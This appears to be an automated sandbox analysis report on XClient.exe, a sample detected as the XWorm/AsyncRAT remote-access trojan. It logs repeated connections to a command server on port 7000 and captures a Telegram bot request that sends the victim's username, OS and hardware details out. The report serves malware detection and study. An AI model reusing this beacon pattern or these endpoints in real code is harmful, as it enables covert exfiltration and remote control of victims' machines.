                                              Dec 30, 2024 20:14:49.056278944 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.062597036 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.067517042 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.094571114 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.099431992 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.110528946 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.115351915 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.126528978 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.131373882 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.142543077 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.147351027 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.174532890 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.179307938 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:49.399318933 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:49.608829975 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:50.635099888 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:50.635174036 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.398488998 CET497317000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.399661064 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.403538942 CET700049731144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.404541969 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.404633999 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.419476032 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.424274921 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.430996895 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.436326981 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.461621046 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.466521978 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.477705956 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.482537031 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.525624037 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.531038046 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.541559935 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.546438932 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.573584080 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.578408957 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.589576960 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.594436884 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.605561972 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.610388994 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.637753010 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.642868996 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:54.701586962 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:54.706429005 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:55.947626114 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:55.951387882 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.701316118 CET497327000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.705549002 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.706357002 CET700049732144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.710433006 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.717353106 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.729456902 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.734333038 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:14:59.749315023 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:14:59.754249096 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:01.277767897 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:01.283272028 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.754534006 CET497337000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.756056070 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.759376049 CET700049733144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:04.760876894 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:04.760971069 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.775459051 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:04.780304909 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:06.324250937 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:06.324326992 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.789855003 CET497347000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.789856911 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.794779062 CET700049734144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:09.794790030 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:09.799309015 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.811309099 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:09.816163063 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:11.354947090 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:11.361931086 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.821580887 CET497357000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.823112965 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.969042063 CET700049735144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:14.969059944 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:14.969175100 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.985213995 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:14.991628885 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.029675007 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.034519911 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.061642885 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.066468000 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.077652931 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.082454920 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:15.955323935 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:15.960150957 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:16.526101112 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:16.526164055 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.099337101 CET497367000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.099363089 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.104255915 CET700049736144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:20.104266882 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:20.111362934 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.123908997 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:20.128726959 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:21.668632984 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:21.673516989 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.129623890 CET497377000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.131107092 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.134476900 CET700049737144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.135905981 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.135967970 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.156759977 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.161626101 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:25.177671909 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:25.182472944 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:26.696139097 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:26.696197987 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.211347103 CET497387000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.215353966 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.216267109 CET700049738144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.220163107 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.223409891 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.239589930 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.244467020 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.257746935 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.262587070 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.544842005 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.549772978 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.560718060 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.565613985 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.576695919 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.581495047 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:30.591739893 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:30.596493959 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:31.778141975 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:31.778446913 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.611383915 CET497397000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.614392042 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.616286039 CET700049739144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:35.619249105 CET700049740144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:35.626384020 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.638386011 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.643232107 CET700049740144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:35.755377054 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:35.760164976 CET700049740144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:37.201652050 CET700049740144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:37.201772928 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.865643978 CET497407000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.867216110 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.871107101 CET700049740144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:40.872478008 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:40.872561932 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.887136936 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.891974926 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:40.929980040 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.934825897 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:40.961738110 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:40.966582060 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:41.009751081 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:41.014676094 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:41.025741100 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:41.030533075 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:41.073693037 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:41.078521967 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:43.264991045 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:43.265068054 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:43.265315056 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:43.265357018 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:43.265538931 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:43.265772104 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:48.855631113 CET497417000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:48.857700109 CET497427000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:48.860548019 CET700049741144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:48.862576962 CET700049742144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:48.865747929 CET497427000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:48.877449989 CET497427000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:48.882210016 CET700049742144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:50.477534056 CET700049742144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:50.477644920 CET497427000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:53.843677998 CET497427000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:53.844906092 CET497437000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:53.848566055 CET700049742144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:53.849746943 CET700049743144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:53.849843025 CET497437000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:53.860455990 CET497437000192.168.2.16144.48.105.119
                                              Dec 30, 2024 20:15:53.865273952 CET700049743144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:55.403444052 CET700049743144.48.105.119192.168.2.16
                                              Dec 30, 2024 20:15:55.403517962 CET497437000192.168.2.16144.48.105.119

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 30, 2024 20:13:40.791917086 CET4989553192.168.2.161.1.1.1
                                              Dec 30, 2024 20:13:40.799556017 CET53498951.1.1.1192.168.2.16

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 30, 2024 20:13:40.791917086 CET192.168.2.161.1.1.10x5a35Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 30, 2024 20:13:40.799556017 CET1.1.1.1192.168.2.160x5a35No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.telegram.org

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1649702149.154.167.2204436524C:\Users\user\Desktop\XClient.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-30 19:13:41 UTC409OUTGET /botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-12-30 19:13:41 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Mon, 30 Dec 2024 19:13:41 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-12-30 19:13:41 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:14:13:36
                                              Start date:30/12/2024
                                              Path:C:\Users\user\Desktop\XClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\XClient.exe"
                                              Imagebase:0x9b0000
                                              File size:40'960 bytes
                                              MD5 hash:CA1B3F03551F41B8C83217C3AF2B0D3C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:false

                                              General

                                              Target ID:12
                                              Start time:14:15:24
                                              Start date:30/12/2024
                                              Path:C:\Users\user\Desktop\XClient.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\XClient.exe"
                                              Imagebase:0x170000
                                              File size:40'960 bytes
                                              MD5 hash:CA1B3F03551F41B8C83217C3AF2B0D3C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:17.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:3
                                                Total number of Limit Nodes:0
                                                execution_graph 2762 7ffec82a21f6 2763 7ffec82a220f SetWindowsHookExW 2762->2763 2765 7ffec82a22c1 2763->2765

                                                Executed Functions

                                                Function 00007FFEC82A21F6 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2407424835.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID: HookWindows
                                                • String ID:
                                                • API String ID: 2559412058-0
                                                • Opcode ID: 70ac6a0d60f9ff9463b7a7299668722f18133e27fe383cf11fdb30e5ad78af0d
                                                • Instruction ID: aee2b48705442fe15763950a0437f529607adc4010703943134af3f56ff07ace
                                                • Opcode Fuzzy Hash: 70ac6a0d60f9ff9463b7a7299668722f18133e27fe383cf11fdb30e5ad78af0d
                                                • Instruction Fuzzy Hash: BA31D53191CA4D8FDB58DF5C98456F9BBE1EB99321F04427FE00DD3252CA64A816CBC1

                                                Executed Functions

                                                Function 00007FFEC82A06ED Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 83a5545be589723619ba629d0ba92e32f9917c02b7d18b358572f9c32c4a9d6e
                                                • Instruction ID: 773b7e50a713554e0c5c79e37091c9727a20396c760fda51305b521aa51dea17
                                                • Opcode Fuzzy Hash: 83a5545be589723619ba629d0ba92e32f9917c02b7d18b358572f9c32c4a9d6e
                                                • Instruction Fuzzy Hash: 1431A83365964B8FD745F728949D5EA7FF2FF8A200B9084F6D808C728BDD249980C799
                                                Function 00007FFEC82A09BD Relevance: .2, Instructions: 167COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3991551515a2675942a52d2f374769a545cde67e1efc042709957dc515423688
                                                • Instruction ID: 3472e9e2de0a153a57aaa9f8e8089942a04a3d4ff59b2c57549572fc909dc0dd
                                                • Opcode Fuzzy Hash: 3991551515a2675942a52d2f374769a545cde67e1efc042709957dc515423688
                                                • Instruction Fuzzy Hash: 8B513421A5950A8FDB48FB74996D5ED7EE2FFC9300B804879E40EC32D6ED289951C748
                                                Function 00007FFEC82A0EB9 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e6fa0a22d3e85c466672c3684bd2b785d110a40c447bf2fd4799d2608df3971
                                                • Instruction ID: 78c10f49ee52310ed5acb5429ce0d7825c2d16b696855e73dd5816e5037921a7
                                                • Opcode Fuzzy Hash: 2e6fa0a22d3e85c466672c3684bd2b785d110a40c447bf2fd4799d2608df3971
                                                • Instruction Fuzzy Hash: D021CF31919A4A8FDB49EB7888592E87BF2FF99300F414079E009D7296DE28A941C784
                                                Function 00007FFEC82A0EF8 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 041b865224894c689937e79bc82752a7d0931491a116e6425b0b470e5e5fc348
                                                • Instruction ID: d36b1660d974bb74a6bb06e6c328269a94dd3092cee63340e1db76e078d812ef
                                                • Opcode Fuzzy Hash: 041b865224894c689937e79bc82752a7d0931491a116e6425b0b470e5e5fc348
                                                • Instruction Fuzzy Hash: D0110031E1991E8FDB88FB6884992FD7AF2FFD8301B504479D00AD7296DD39A981C784
                                                Function 00007FFEC82A10E4 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef7aa0f6a73bd4377d65751a643d70ccfd198d856fc204e56adb27123101d29b
                                                • Instruction ID: 79833920c9bdd0beef078a716bc63737921af35ff8e441a184f207341019d3db
                                                • Opcode Fuzzy Hash: ef7aa0f6a73bd4377d65751a643d70ccfd198d856fc204e56adb27123101d29b
                                                • Instruction Fuzzy Hash: 6AE03021B1491E4ADF84A79CA8592FDA3D1FF9C211F000176D50CD7282DE1864414790
                                                Function 00007FFEC82A1058 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d612007f48c5794ca66131121a020241a5c5e243721a7eec81d273f8ecda8db1
                                                • Instruction ID: 8574c7813b8455b3e04763c1c868c85bb0e1d6ba042664fe743330cd51ce8abe
                                                • Opcode Fuzzy Hash: d612007f48c5794ca66131121a020241a5c5e243721a7eec81d273f8ecda8db1
                                                • Instruction Fuzzy Hash: 3FF01C20B19D068BF69477BC481A37D61D6DF99702F10427AA409C3296CC28A9514392
                                                Function 00007FFEC82A0E7C Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ae5e49ea6e0fb5d292197500c32d86d395e89ba3fe2005bc9c8aa51c8b71cd4
                                                • Instruction ID: 9ff992778d299694ae9814c40594c41dda6d284ab725f62240f934f48f29dec3
                                                • Opcode Fuzzy Hash: 4ae5e49ea6e0fb5d292197500c32d86d395e89ba3fe2005bc9c8aa51c8b71cd4
                                                • Instruction Fuzzy Hash: 5DE0863170D9584FE740F76CF8486A87BD0EF56321B4501D7E44DC7163DA66DC828780
                                                Function 00007FFEC82A12EF Relevance: .0, Instructions: 25COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d590394a45051de932437b44554a34a3cf928e9a8df75ff827bd3789624bc212
                                                • Instruction ID: 2b470af007953a3f76cdb33c88b2c3e5c3d1ec2ce4a2d0981f34ffd8f7a5a858
                                                • Opcode Fuzzy Hash: d590394a45051de932437b44554a34a3cf928e9a8df75ff827bd3789624bc212
                                                • Instruction Fuzzy Hash: 91E02633A085150BA748E60CA88A8B973D2EBD4360B000539F808C7245DD18DA8247C1
                                                Function 00007FFEC82A10B9 Relevance: .0, Instructions: 13COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02d789b4f600d34ee953c1c88c57650b7c9a3360030c51dc1319e4a7d3850a03
                                                • Instruction ID: fc0459429d1ed32a3ad0e7ecc56919eecf93dfd938ccdf157a7c482fc6718904
                                                • Opcode Fuzzy Hash: 02d789b4f600d34ee953c1c88c57650b7c9a3360030c51dc1319e4a7d3850a03
                                                • Instruction Fuzzy Hash: 5CD01210B54A054BDBC47728486D77CAAD2FF84200B510068E41EC3287EF286C134B41
                                                Function 00007FFEC82A0D96 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2257513014.00007FFEC82A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEC82A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_7ffec82a0000_XClient.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
